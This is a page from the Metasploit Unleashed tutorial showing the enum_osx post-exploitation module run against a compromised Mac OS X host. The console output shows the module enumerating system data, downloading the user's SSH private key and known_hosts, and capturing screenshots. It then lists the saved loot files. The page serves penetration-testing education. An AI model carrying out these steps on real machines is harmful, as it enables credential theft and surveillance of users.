OS X Post Gather Modules

From Metasploit Unleashed
Jump to: navigation, search

Contents


enum_osx

The "enum_osx" post module gathers basic system information from Mac OS X Tiger, Leopard, Snow Leopard and Lion systems.

msf > use post/osx/gather/enum_osx
msf  post(enum_osx) > run

[*] Running module against Victim.local
[*] This session is running as root!
[*] Saving all data to /root/.msf4/logs/post/enum_osx/Victim.local_20120926.3521
[*] 	Enumerating OS
[*] 	Enumerating Network
[*] 	Enumerating Bluetooth
[*] 	Enumerating Ethernet
[*] 	Enumerating Printers
[*] 	Enumerating USB
[*] 	Enumerating Airport
[*] 	Enumerating Firewall
[*] 	Enumerating Known Networks
[*] 	Enumerating Applications
[*] 	Enumerating Development Tools
[*] 	Enumerating Frameworks
[*] 	Enumerating Logs
[*] 	Enumerating Preference Panes
[*] 	Enumerating StartUp
[*] 	Enumerating TCP Connections
[*] 	Enumerating UDP Connections
[*] 	Enumerating Environment Variables
[*] 	Enumerating Last Boottime
[*] 	Enumerating Current Activity
[*] 	Enumerating Process List
[*] 	Enumerating Users
[*] 	Enumerating Groups
[*] .ssh Folder is present for Victim
[*] 	Downloading id_dsa
[*] 	Downloading known_hosts
[*] .gnupg Folder is present for Victim
[*] 	Downloading ls: /Users/Victim/.gnupg: No such file or directory
[*] Capturing screenshot
[*] Capturing screenshot for each loginwindow process since privilege is root
[*] 	Capturing for PID:2508
...snip...
[*] Post module execution completed

root@kali:~/.msf4/logs/post/enum_osx/RJLAP4.local_20120926.3521# ls
Airport.txt                Firewall.txt        OS.txt                                               TCP Connections.txt
Applications.txt           Frameworks.txt      OS X Gather Mac OS X System Information Enumeration  UDP Connections.txt
Bluetooth.txt              Groups.txt          Preference Panes.txt                                 USB.txt
Current Activity.txt       Known Networks.txt  Printers.txt                                         Users.txt
Development Tools.txt      Last Boottime.txt   Process List.txt
Environment Variables.txt  Logs.txt            screenshot_2058.jpg
Ethernet.txt               Network.txt         StartUp.txt

root@kali:~/.msf4/logs/post/enum_osx/Victim.local_20120926.3521# more Firewall.txt 
Firewall:

    Firewall Settings:

      Mode: Block all incoming connections
      Firewall Logging: Yes
      Stealth Mode: Yes

root@kali:~/.msf4/logs/post/enum_osx/Victim.local_20120926.3521# more OS.txt 
Software:

    System Software Overview:

      System Version: Mac OS X 10.7.4 (11E53)
      Kernel Version: Darwin 11.4.0
      Boot Volume: Macintosh HD
      Boot Mode: Normal
      Computer Name: Victim
      User Name: System Administrator (root)
      Secure Virtual Memory: Enabled
      64-bit Kernel and Extensions: Yes
      Time since boot: 12:13